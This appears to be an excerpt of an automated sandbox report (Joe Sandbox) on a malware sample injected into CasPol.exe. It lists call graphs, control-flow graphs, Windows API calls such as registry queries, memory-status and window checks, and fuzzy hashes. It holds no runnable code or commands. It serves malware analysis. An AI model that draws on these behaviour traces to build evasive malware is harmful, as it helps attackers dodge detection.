63504->63505 63507 20ac0f46 63505->63507 63506->63507 63508 20ac11e8 3 API calls 63506->63508 63509 20ac11f8 3 API calls 63506->63509 63507->63480 63508->63507 63509->63507 63518 20ac122c 63510->63518 63526 20ac1230 63510->63526 63511 20ac1206 63511->63498 63515 20ac1206 63514->63515 63516 20ac122c 2 API calls 63514->63516 63517 20ac1230 2 API calls 63514->63517 63515->63498 63516->63515 63517->63515 63519 20ac123d 63518->63519 63520 20ac1265 63518->63520 63519->63511 63534 20ac0ab4 63520->63534 63522 20ac1286 63522->63511 63524 20ac134e GlobalMemoryStatusEx 63525 20ac137e 63524->63525 63525->63511 63527 20ac123d 63526->63527 63528 20ac1265 63526->63528 63527->63511 63529 20ac0ab4 GlobalMemoryStatusEx 63528->63529 63531 20ac1282 63529->63531 63530 20ac1286 63530->63511 63531->63530 63532 20ac134e GlobalMemoryStatusEx 63531->63532 63533 20ac137e 63532->63533 63533->63511 63535 20ac1308 GlobalMemoryStatusEx 63534->63535 63537 20ac1282 63535->63537 63537->63522 63537->63524 63539 20ac455f 63538->63539 63542 20ac5d2c 63539->63542 63541 20ac683e 63541->63541 63543 20ac5d37 63542->63543 63544 20ac6f64 63543->63544 63545 20ac6fbf 63543->63545 63550 20ac87e8 63543->63550 63555 20ac87e6 63543->63555 63544->63545 63560 21295860 63544->63560 63564 21295850 63544->63564 63545->63541 63552 20ac8809 63550->63552 63551 20ac882d 63551->63544 63552->63551 63568 20ac8d4f 63552->63568 63572 20ac8da0 63552->63572 63556 20ac8809 63555->63556 63557 20ac882d 63556->63557 63558 20ac8d4f 6 API calls 63556->63558 63559 20ac8da0 6 API calls 63556->63559 63557->63544 63558->63557 63559->63557 63562 212958c5 63560->63562 63561 21295912 63561->63545 63562->63561 63563 21295d28 WaitMessage 63562->63563 63563->63562 63566 212958c5 63564->63566 63565 21295d28 WaitMessage 63565->63566 63566->63565 63567 21295912 63566->63567 63567->63545 63569 20ac8db6 63568->63569 63570 20ac8de6 63569->63570 63576 20ac898c 63569->63576 63570->63551 63573 20ac8dad 63572->63573 63574 20ac898c 6 API calls 
63573->63574 63575 20ac8de6 63573->63575 63574->63575 63575->63551 63577 20ac8997 63576->63577 63579 20ac8e58 63577->63579 63580 20ac89c0 63577->63580 63579->63579 63581 20ac89cb 63580->63581 63587 20ac89d0 63581->63587 63583 20ac8ec7 63593 20ace278 63583->63593 63602 20ace290 63583->63602 63584 20ac8f01 63584->63579 63588 20ac89db 63587->63588 63611 20ac9b94 63588->63611 63590 20aca150 63590->63583 63591 20ac87e8 6 API calls 63591->63590 63592 20ac9f28 63592->63590 63592->63591 63595 20ace2c1 63593->63595 63597 20ace3c1 63593->63597 63594 20ace2cd 63594->63584 63595->63594 63619 20ace4f8 63595->63619 63623 20ace508 63595->63623 63596 20ace30d 63627 20acf808 63596->63627 63634 20acf7f9 63596->63634 63597->63584 63604 20ace2c1 63602->63604 63606 20ace3c1 63602->63606 63603 20ace2cd 63603->63584 63604->63603 63609 20ace4f8 3 API calls 63604->63609 63610 20ace508 3 API calls 63604->63610 63605 20ace30d 63607 20acf808 3 API calls 63605->63607 63608 20acf7f9 3 API calls 63605->63608 63606->63584 63607->63606 63608->63606 63609->63605 63610->63605 63612 20ac9b9f 63611->63612 63613 20acb351 63612->63613 63615 20ac9d3c 63612->63615 63613->63592 63616 20acb4b0 FindWindowW 63615->63616 63618 20acb535 63616->63618 63618->63613 63641 20ace548 63619->63641 63650 20ace558 63619->63650 63620 20ace512 63620->63596 63624 20ace512 63623->63624 63625 20ace548 2 API calls 63623->63625 63626 20ace558 2 API calls 63623->63626 63624->63596 63625->63624 63626->63624 63628 20acf833 63627->63628 63631 20acf8e2 63628->63631 63659 20acd4ec 63628->63659 63635 20acf833 63634->63635 63636 20acd4ec GetModuleHandleW 63635->63636 63638 20acf8e2 63635->63638 63637 20acf926 63636->63637 63639 21290848 2 API calls 63637->63639 63640 21290740 2 API calls 63637->63640 63639->63638 63640->63638 63642 20ace569 63641->63642 63645 20ace58c 63641->63645 63643 20acd4ec GetModuleHandleW 63642->63643 63644 20ace574 63643->63644 63644->63645 63649 20ace7e2 GetModuleHandleW 63644->63649 63645->63620 63646 
20ace584 63646->63645 63647 20ace790 GetModuleHandleW 63646->63647 63648 20ace7bd 63647->63648 63648->63620 63649->63646 63651 20ace569 63650->63651 63654 20ace58c 63650->63654 63652 20acd4ec GetModuleHandleW 63651->63652 63653 20ace574 63652->63653 63653->63654 63658 20ace7e2 GetModuleHandleW 63653->63658 63654->63620 63655 20ace584 63655->63654 63656 20ace790 GetModuleHandleW 63655->63656 63657 20ace7bd 63656->63657 63657->63620 63658->63655 63660 20ace748 GetModuleHandleW 63659->63660 63662 20ace7bd 63660->63662 63663 21290848 63662->63663 63667 21290740 63662->63667 63665 21290898 CreateWindowExW 63663->63665 63666 2129088c CreateWindowExW 63663->63666 63664 2129087d 63664->63631 63665->63664 63666->63664 63668 21290774 63667->63668 63670 21290898 CreateWindowExW 63668->63670 63671 2129088c CreateWindowExW 63668->63671 63669 2129087d 63669->63631 63670->63669 63671->63669 63672 20ac61d8 DuplicateHandle 63673 20ac626e 63672->63673 62442 21292fac 62443 21292fbc 62442->62443 62444 2129306a CallWindowProcW 62443->62444 62445 21293019 62443->62445 62444->62445 63674 1d8be330 63675 1d8be348 63674->63675 63676 1d8be3a2 63675->63676 63681 21290a50 63675->63681 63686 21290a3f 63675->63686 63691 21291ba8 63675->63691 63695 21291b99 63675->63695 63682 21290a76 63681->63682 63684 21291b99 CallWindowProcW 63682->63684 63685 21291ba8 CallWindowProcW 63682->63685 63683 21290a97 63683->63676 63684->63683 63685->63683 63687 21290a76 63686->63687 63689 21291b99 CallWindowProcW 63687->63689 63690 21291ba8 CallWindowProcW 63687->63690 63688 21290a97 63688->63676 63689->63688 63690->63688 63693 21291bd5 63691->63693 63694 21291bf9 63693->63694 63699 2129180c CallWindowProcW 63693->63699 63697 21291bd5 63695->63697 63698 21291bf9 63697->63698 63700 2129180c CallWindowProcW 63697->63700 63699->63694 63700->63698 62446 20ace9b0 62447 20ace9f8 LoadLibraryExW 62446->62447 62448 20ace9f2 62446->62448 62449 20acea29 62447->62449 62448->62447
Strings
Memory Dump Source
• Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
Similarity
• API ID:
• String ID: (ok$(ok$(ok$(ok$(ok$(ok$(ok
• API String ID: 0-1422397375
• Opcode ID: 0e6d126912f57803845c6fb309c5e603440bbcbe4a03a40417c58e8164ac9c84
• Instruction ID: c7d63dc13eb1e68dcb985706a746e1d07bdb85091de17d2db6372200317eef86
• Opcode Fuzzy Hash: 0e6d126912f57803845c6fb309c5e603440bbcbe4a03a40417c58e8164ac9c84
• Instruction Fuzzy Hash: F5829C31A1024ACFCB15DF68C984AAEBBF2FF88314F698559E606DB261D770EC41CB51
Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 1167 12af950-12af959 1169 12af97b-12af989 1167->1169 1170 12af95c-12af979 1167->1170 1171 12af98f-12af9a3 1169->1171 1172 12afa44-12afa54 1169->1172 1170->1169 1175 12af9a9 1171->1175 1176 12af9a5-12af9a7 1171->1176 1271 12afa56 call 12af950 1172->1271 1272 12afa56 call 12afc15 1172->1272 1177 12af9ac-12af9c1 1175->1177 1176->1177 1180 12afa08-12afa31 call 12af698 1177->1180 1181 12af9c3-12af9d2 1177->1181 1178 12afa5c-12afa63 1185 12afa3c-12afa42 1180->1185 1186 12afa33-12afa3a 1180->1186 1187 12af9d8-12af9db 1181->1187 1188 12afa64 1181->1188 1185->1178 1186->1178 1189 12afa69-12afa7e 1187->1189 1190 12af9e1-12af9e7 1187->1190 1188->1189 1194 12afa9f-12afaa3 1189->1194 1195 12afa80-12afa9e 1189->1195 1190->1180 1192 12af9e9-12afa06 1190->1192 1192->1180 1197 12afae5-12afae7 1194->1197 1198 12afaa5-12afaaa 1194->1198 1195->1194 1202 12afae9-12afaef 1197->1202 1203 12afaf1-12afb06 1197->1203 1200 12afccc 1198->1200 1201 12afab0-12afab3 1198->1201 1205 12afcd1-12afce6 1200->1205 1204 12afab9-12afabf 1201->1204 1201->1205 1206 12afb27-12afb29 1202->1206 1219 12afb08-12afb0c 1203->1219 1220 12afb21 1203->1220 1204->1197 1208 12afac1-12afae0 1204->1208 1213 12afce8-12afcfe 1205->1213 1214 12afd07-12afd5e call 12ac9e8 call 12acfa8 call 12ac9e8 1205->1214 1209 12afb2b-12afb30 1206->1209 1210 12afb32-12afb3b 1206->1210 1231 12afbf6-12afc0c call 12ab284 1208->1231 1209->1210 1212 12afb95-12afb98 1209->1212 1222 12afb4b-12afb5d 1210->1222 1223 12afb3d-12afb46 1210->1223 1212->1200 1217 12afb9e-12afba1 1212->1217 1213->1214 1258 12afd63-12afda3 call 12ad698 1214->1258 1217->1205 1221 12afba7-12afbad 1217->1221 1219->1220 1224 12afb0e-12afb1f 1219->1224 1220->1206 1227 12afbce-12afbdf 1221->1227 1228 12afbaf-12afbcc 1221->1228 1222->1200 1233 12afb63-12afb66 1222->1233 1223->1227 1224->1206 1224->1220 1227->1231 1239 12afbe1-12afbf0 
1227->1239 1228->1227 1250 12afc11-12afca8 call 12acde8 1231->1250 1233->1205 1238 12afb6c-12afb72 1233->1238 1238->1227 1242 12afb74-12afb93 1238->1242 1239->1231 1242->1227 1264 12afcaa-12afcae 1250->1264 1265 12afcb0-12afcb6 1250->1265 1264->1265 1266 12afcb8-12afcbe 1264->1266 1267 12afcc0-12afcc9 1265->1267 1266->1267 1271->1178 1272->1178
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LRk$\$\$\$\
                                                                                                                        • API String ID: 0-2704870732
                                                                                                                        • Opcode ID: 37b6e92b6442b99a33c97437fed826e942e338604023d3426b81191c0911466a
                                                                                                                        • Instruction ID: 49ebfce4542065af9dcd5d2e81a84b6dad162ca14733e0b1388b9a029ebf7071
                                                                                                                        • Opcode Fuzzy Hash: 37b6e92b6442b99a33c97437fed826e942e338604023d3426b81191c0911466a
                                                                                                                        • Instruction Fuzzy Hash: 53B12831B102158FCB14DB7CCA916BEB7F2AF88310F558929DA16DB391EB78DC068791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (ok$(ok$(ok
                                                                                                                        • API String ID: 0-4197759848
                                                                                                                        • Opcode ID: 3ac55717253e4987f59e3bbbc6acc8c178746eeda0e493337a114bd556c82c14
                                                                                                                        • Instruction ID: ebb42f64d4fd1e45b9f60aebb215cc325a24e967563ec264d607024a89652ed6
                                                                                                                        • Opcode Fuzzy Hash: 3ac55717253e4987f59e3bbbc6acc8c178746eeda0e493337a114bd556c82c14
                                                                                                                        • Instruction Fuzzy Hash: 71729E70A10119DFDB15CFA8C984AAEBBB6FF88304F558069EA05EB361DB35DC41CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 234a016b0b3e361b1dba4f172c15224c6a79fd2a427e47effdca2413f36730b8
                                                                                                                        • Instruction ID: f8067fe03480b7eec4123b02e163b09b9bdcfff1980f06d3d657e775f281b653
                                                                                                                        • Opcode Fuzzy Hash: 234a016b0b3e361b1dba4f172c15224c6a79fd2a427e47effdca2413f36730b8
                                                                                                                        • Instruction Fuzzy Hash: 81229935B042148FDB04DBB4C4946AEB7F2BF89304F958469D906EB3A5EB39DD06CB81
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6823003129731fe6d963eb2d7af14fb380b851b169d237f1929a74a6f40518ee
                                                                                                                        • Instruction ID: 1d1fd057beefe196e15225501d6051175ede8ba9ce1681f0c8de764ea7796b25
                                                                                                                        • Opcode Fuzzy Hash: 6823003129731fe6d963eb2d7af14fb380b851b169d237f1929a74a6f40518ee
                                                                                                                        • Instruction Fuzzy Hash: 95F15E30A00319CFEB04CFA9C988B9DBBF5BF49314F25815AE505AF295DB74A946CF90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1202a9b0eaa7c683819b3f0991b0e66c4b68ddbc195ddaf25b9f82fb8897df53
                                                                                                                        • Instruction ID: 54e643031befddc9924cf4dea63c52fcc6050854c698aaae7b8e10fe7a102a93
                                                                                                                        • Opcode Fuzzy Hash: 1202a9b0eaa7c683819b3f0991b0e66c4b68ddbc195ddaf25b9f82fb8897df53
                                                                                                                        • Instruction Fuzzy Hash: 29B18C35A102198FCB14DFB8C4886AEBBF2FF89314F598429E606E7391DB359D42CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750913183.000000001DA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DA10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1da10000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 49fc184247f8d1487a1291fd172545a88bc5b8407fecf45dd3ef08e49e3a8cf3
                                                                                                                        • Instruction ID: 07facfb24c0c8ca53daf78aad34ab9d41aea93dca151d9ffbdf3953f84ad962d
                                                                                                                        • Opcode Fuzzy Hash: 49fc184247f8d1487a1291fd172545a88bc5b8407fecf45dd3ef08e49e3a8cf3
                                                                                                                        • Instruction Fuzzy Hash: A6D06771105290CFD7092BA4DE8D6593F74FF5636230A54A2E159CA066DB330824EB21
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 1273 20adeac1-20adeadf 1274 20adeb04-20adeb1e 1273->1274 1275 20adeae1-20adeaeb 1273->1275 1279 20adeb3f-20adeb8a LdrInitializeThunk 1274->1279 1280 20adeb20-20adeb35 1274->1280 1276 20adeaed-20adeafe 1275->1276 1277 20adeb00-20adeb03 1275->1277 1276->1277 1288 20adeb90-20adebaa 1279->1288 1289 20adecd3-20adecf0 1279->1289 1280->1279 1288->1289 1292 20adebb0-20adebca 1288->1292 1300 20adecf5-20adecfe 1289->1300 1295 20adebcc-20adebce 1292->1295 1296 20adebd0 1292->1296 1298 20adebd3-20adec2e call 20ad67f4 1295->1298 1296->1298 1308 20adec34 1298->1308 1309 20adec30-20adec32 1298->1309 1310 20adec37-20adecd1 call 20ad67f4 1308->1310 1309->1310 1310->1300
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: LRk$LRk
                                                                                                                        • API String ID: 2994545307-3442965990
                                                                                                                        • Opcode ID: 5f3f766a18a512507b7178201e007638ba74c23e8281d2e798cfab63d5d8d999
                                                                                                                        • Instruction ID: 1ad0b87116ac02823c70d8a2d7ff876e8bd44855f3e82bf611924adad45f41b0
                                                                                                                        • Opcode Fuzzy Hash: 5f3f766a18a512507b7178201e007638ba74c23e8281d2e798cfab63d5d8d999
                                                                                                                        • Instruction Fuzzy Hash: 3351E331B042089FCB04EBF4C895AEE77F6BF85204F55856AD502DB392EB71E905C792
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 1328 20adeb20-20adeb8a LdrInitializeThunk 1336 20adeb90-20adebaa 1328->1336 1337 20adecd3-20adecf0 1328->1337 1336->1337 1340 20adebb0-20adebca 1336->1340 1348 20adecf5-20adecfe 1337->1348 1343 20adebcc-20adebce 1340->1343 1344 20adebd0 1340->1344 1346 20adebd3-20adec2e call 20ad67f4 1343->1346 1344->1346 1356 20adec34 1346->1356 1357 20adec30-20adec32 1346->1357 1358 20adec37-20adecd1 call 20ad67f4 1356->1358 1357->1358 1358->1348
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: LRk$LRk
                                                                                                                        • API String ID: 2994545307-3442965990
                                                                                                                        • Opcode ID: 6714be14fd7553073d5b6f68d3a2dd5a6984491e126d78dff97a2a858ecc540d
                                                                                                                        • Instruction ID: 5891bb3d9c3f2dfc69198c3425ed8d7aae26e07ccd865498f53d25ce3b010e76
                                                                                                                        • Opcode Fuzzy Hash: 6714be14fd7553073d5b6f68d3a2dd5a6984491e126d78dff97a2a858ecc540d
                                                                                                                        • Instruction Fuzzy Hash: 4A518031B002199FCB04EBF4C485AEEB7F6BF85204B558969E502AB351EF71E905CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 1825 20ac1230-20ac123b 1826 20ac123d-20ac1264 call 20ac0aa8 1825->1826 1827 20ac1265-20ac1284 call 20ac0ab4 1825->1827 1833 20ac128a-20ac12e9 1827->1833 1834 20ac1286-20ac1289 1827->1834 1841 20ac12ef-20ac137c GlobalMemoryStatusEx 1833->1841 1842 20ac12eb-20ac12ee 1833->1842 1845 20ac137e-20ac1384 1841->1845 1846 20ac1385-20ac13ad 1841->1846 1845->1846
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: lO5
                                                                                                                        • API String ID: 0-2989342500
                                                                                                                        • Opcode ID: 7353bad71eec563ea6b8289b5aa64b97cf15c54035acee35ff80238439d89f22
                                                                                                                        • Instruction ID: 03f3a119e0d6697161bb005f6bc60221cde41ccb68db05d16f3061cd2b6b8f1e
                                                                                                                        • Opcode Fuzzy Hash: 7353bad71eec563ea6b8289b5aa64b97cf15c54035acee35ff80238439d89f22
                                                                                                                        • Instruction Fuzzy Hash: 8B412472E083958FCB04CFB5C41479EBFB1AF8A210F06856AD544E7391DB749844CBE2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 1849 20ad7dac-20ad7dbf 1850 20ad7de4-20ad7df9 1849->1850 1851 20ad7dc1-20ad7dcb 1849->1851 1856 20ad7dfb-20ad7e2f 1850->1856 1857 20ad7e31-20ad7e50 1850->1857 1852 20ad7dcd-20ad7dde 1851->1852 1853 20ad7de0-20ad7de3 1851->1853 1852->1853 1856->1857 1858 20ad7e58-20ad7ec4 RegOpenKeyExW 1857->1858 1859 20ad7e52-20ad7e55 1857->1859 1861 20ad7ecd-20ad7f05 1858->1861 1862 20ad7ec6-20ad7ecc 1858->1862 1859->1858 1866 20ad7f18 1861->1866 1867 20ad7f07-20ad7f10 1861->1867 1862->1861 1868 20ad7f19 1866->1868 1867->1866 1868->1868
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20AD7EB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: 0=5
                                                                                                                        • API String ID: 71445658-1686352640
                                                                                                                        • Opcode ID: eff1d187ef5f473286050984c8a9d9397e8b30a6775dfece61ffd131f9cc0654
                                                                                                                        • Instruction ID: 7c0a5080c3ee8a9b7180238a27134637c7447da78c41498736a0d8f1fc1f7b94
                                                                                                                        • Opcode Fuzzy Hash: eff1d187ef5f473286050984c8a9d9397e8b30a6775dfece61ffd131f9cc0654
                                                                                                                        • Instruction Fuzzy Hash: B94186B19053888FDB04CFA8C588A8EFFF1BF49304F6581AAE449AB341D7749C45CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,20AD7C03,00000100,00000000,?), ref: 20AD8171
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID: $<5
                                                                                                                        • API String ID: 3660427363-3124369919
                                                                                                                        • Opcode ID: 70839e8513a2da8686bb8dd2cfee15c923d38af20d2847bb7c335340917036a0
                                                                                                                        • Instruction ID: 173433a65fb668645623f83bff49c2de2b7792bf8ca0eda52201dab31a076cf2
                                                                                                                        • Opcode Fuzzy Hash: 70839e8513a2da8686bb8dd2cfee15c923d38af20d2847bb7c335340917036a0
                                                                                                                        • Instruction Fuzzy Hash: 9631E1B1D012589FCB10CFDAC884A8EFBF5BF48700F54852AE818AB314D774A909CF91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20AD7EB4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: 0=5
                                                                                                                        • API String ID: 71445658-1686352640
                                                                                                                        • Opcode ID: 0bed74c0b2efecbb78ec8a0fa37d6f745ae7408ab3a84e88f7750d904c62001c
                                                                                                                        • Instruction ID: 354a07783a6820dcae60f27d86a23aa1529656ccd1d6dfc1080ad4b641b0918b
                                                                                                                        • Opcode Fuzzy Hash: 0bed74c0b2efecbb78ec8a0fa37d6f745ae7408ab3a84e88f7750d904c62001c
                                                                                                                        • Instruction Fuzzy Hash: 5E3110B2D012498FDB14CFA9C584A8EFFF1BF48304F64856AE808AB341D7759944CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $k$$k
                                                                                                                        • API String ID: 0-2008463310
                                                                                                                        • Opcode ID: 26d82aa702918a464fa03742ab35b93b29c3473720e1b929c8c3ed3963ce34c2
                                                                                                                        • Instruction ID: 04651514357dc0f99452113e3910750030757e634e0e023987a6d79a4c33fbda
                                                                                                                        • Opcode Fuzzy Hash: 26d82aa702918a464fa03742ab35b93b29c3473720e1b929c8c3ed3963ce34c2
                                                                                                                        • Instruction Fuzzy Hash: 11627234A041188FDB54DFA4C850B9EBBB6EF88304F5580ADD2066B794DF349D56CFA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 09e6e411189b9db2087cb628510bcdfa300727fbb9daf614004e46e3268bc396
                                                                                                                        • Instruction ID: d353b2277605ba29ff98971f79808b31bd2abab4cd67c194979e67ca9b74c962
                                                                                                                        • Opcode Fuzzy Hash: 09e6e411189b9db2087cb628510bcdfa300727fbb9daf614004e46e3268bc396
                                                                                                                        • Instruction Fuzzy Hash: 3F814670A10B058FD724CFA9C18179ABBF1FF88204F41892ED58AD7B50DB75E945CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 212909AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: 98338717f9efe703db3201032d2344397e6a2b2771439959fb723403c2b61916
                                                                                                                        • Instruction ID: 3d1030b64e590ee141944e15bc7a16b2f781b4498741f598253d3d20c2c06a29
                                                                                                                        • Opcode Fuzzy Hash: 98338717f9efe703db3201032d2344397e6a2b2771439959fb723403c2b61916
                                                                                                                        • Instruction Fuzzy Hash: 5051B3B1D10209DFEB14CF99C884ADDBFB5FF48310F20812AE919AB250D7749945CF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 212909AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: da2d4ff4bed3b8b6d918bf6590a638f5047fa2dbebb91f7f1116ea8db2580fd2
                                                                                                                        • Instruction ID: 0492b71a6c7d042d53d2a5bdd9b72292c94e00a447fe466644b0174b328eaa80
                                                                                                                        • Opcode Fuzzy Hash: da2d4ff4bed3b8b6d918bf6590a638f5047fa2dbebb91f7f1116ea8db2580fd2
